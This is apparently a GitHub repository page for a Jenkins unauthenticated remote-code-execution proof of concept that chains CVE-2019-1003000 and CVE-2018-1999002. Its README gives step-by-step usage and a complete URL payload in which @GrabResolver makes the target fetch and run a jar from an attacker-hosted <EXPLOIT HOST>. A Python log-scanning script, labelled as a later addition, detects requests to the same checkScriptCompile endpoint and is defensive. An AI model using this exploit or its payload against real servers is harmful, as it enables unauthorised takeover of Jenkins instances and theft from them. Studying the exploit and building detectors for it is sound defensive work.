😈 Jenkins RCE PoC. From unauthenticated user to remote code execution - it's a hacker's dream! (Chaining CVE-2019-1003000, CVE-2018-1999002, and more)
Latest commit 83555c0 Feb 21, 2019
Type Name Latest commit message Commit time
code Initial commit Feb 19, 2019
www/package/payload/1 Initial commit Feb 19, 2019
README.txt fixed EXPLOIT HOST Feb 21, 2019
build.sh Initial commit Feb 19, 2019

README.txt

JENKINS UNAUTHENTICATED REMOTE CODE EXECUTION
---------------------------------------------

Exploit compiled by me, but full credits for exploit discovery and exploit chaining go to Orange Tsai (orange.tw).

Read his write-ups on this exploit here -
Part 1: https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
Part 2: http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
His GitHub: https://github.com/orangetw


INSTRUCTIONS:
-------------
- Edit code/Payload.java to your specifications, then run build.sh to generate a jar and copy it to the web folder.
- Once that is finished, copy the inner contents of www/ to a webserver.
- In the URL payload, replace <TARGET HOST> with the hostname of the server, and <EXPLOIT HOST> with the hostname of the server where you uploaded your files.


URL Payload:
------------
http://<TARGET HOST>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='payload', root='http://<EXPLOIT HOST>')%0a
@Grab(group='package', module='payload', version='1')%0a
import Payload;
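
Detection example (added here; not part of the original repository or of Orange Tsai's write-ups): a log scan that flags requests reaching the checkScriptCompile endpoint shown above and reports any @Grab annotations and resolver root carried in the value parameter. It assumes a combined-format access log from a proxy in front of Jenkins; the sample lines, addresses and the host repo.example.invalid are constructed placeholders.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and annotation names come from the URL payload in this README.
ENDPOINT = ("/descriptorByName/org.jenkinsci.plugins.workflow.cps."
            "CpsFlowDefinition/checkScriptCompile")
GRAB = re.compile(r"@Grab\w*")
RESOLVER_ROOT = re.compile(r"@GrabResolver\s*\([^)]*?root\s*=\s*['\"]([^'\"]+)")
# Assumption: combined-format access log from a proxy in front of Jenkins.
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" '
                     r'(?P<status>\d{3})')

# Constructed sample lines; addresses and hostnames are placeholders.
SAMPLE_LOG = [
    '198.51.100.4 - - [21/Feb/2019:09:58:11 +0000] "GET /login HTTP/1.1" 200 512',
    '203.0.113.7 - - [21/Feb/2019:10:00:02 +0000] "GET /securityRealm/user/admin'
    + ENDPOINT + "?value=@GrabConfig(disableChecksums=true)%0a"
    "@GrabResolver(name='payload',%20root='http://repo.example.invalid')%0a"
    "@Grab(group='package',%20module='payload',%20version='1')%0a"
    'import%20Payload; HTTP/1.1" 200 46',
    '198.51.100.9 - - [21/Feb/2019:10:05:40 +0000] "GET /job/demo' + ENDPOINT
    + '?value=println%20%22hi%22 HTTP/1.1" 200 46',
]

def scan(lines):
    """Return one finding per logged request that reaches checkScriptCompile."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        path = unquote(url.path)
        if ENDPOINT not in path:
            continue
        # parse_qs percent-decodes the Groovy source passed in ?value=
        script = "\n".join(parse_qs(url.query).get("value", []))
        annotations = sorted(set(GRAB.findall(script)))
        root = RESOLVER_ROOT.search(script)
        findings.append({
            "client": m["ip"],
            "status": int(m["status"]),
            "via_security_realm": "/securityRealm/" in path,
            "annotations": annotations,
            # External repository the script would fetch from: check egress logs
            "resolver_root": root.group(1) if root else None,
            "severity": "high" if annotations else "review",
        })
    return findings
```

Call scan() on an iterable of log lines, for example scan(SAMPLE_LOG). A script sent in a POST body does not appear in an access log, so endpoint-only "review" findings from unexpected clients still deserve a look.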